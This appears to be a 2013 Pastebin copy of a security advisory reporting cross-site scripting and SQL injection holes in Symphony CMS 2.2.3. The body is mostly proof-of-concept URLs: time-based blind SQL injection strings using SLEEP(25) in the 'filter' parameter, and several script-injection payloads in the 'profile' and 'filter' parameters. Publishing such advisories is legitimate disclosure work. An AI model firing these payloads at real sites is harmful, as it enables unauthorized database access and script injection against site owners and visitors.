YeiZea

XSS and SQL Injection Vulnerabilities on Symphony CMS

Apr 27th, 2013
127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.96 KB | None | 0 0
  1. Name : XSS and SQL Injection Vulnerabilities on Symphony CMS
  2. Software : Symphony CMS 2.2.3 and possibly below
  3. Vendor Homepage : http://symphony-cms.com
  4. Vulnerability Type : Cross-Site Scripting and SQL Injection
  5. Severity : Critical
  6. Researcher : Mesut Timur <mesut [at] mavitunasecurity [dot] com>
  7. Advisory Reference : NS-11-008
  8.  
  9.  
  10. http://example.com/symphony/publish/comments/?filter='+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+'
  11. http://example.com/symphony/publish/images/?filter='+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+'
  12. http://example.com/?profile='"--></style></script><script>alert(1)</script>
  13. http://example.com/symphony/publish/comments/?filter='"--></style></script><script>alert(1)</script>
  14. http://example.com/symphony/publish/images/?filter='"--></style></script><script>alert(1)</script>
  15. http://example.com/about/?profile='"--></style></script><script>alert(1)</script>
  16. http://example.com/drafts/?profile='"--></style></script><script>alert(1)</script>
Advertisement
Add Comment
Please, Sign In to add comment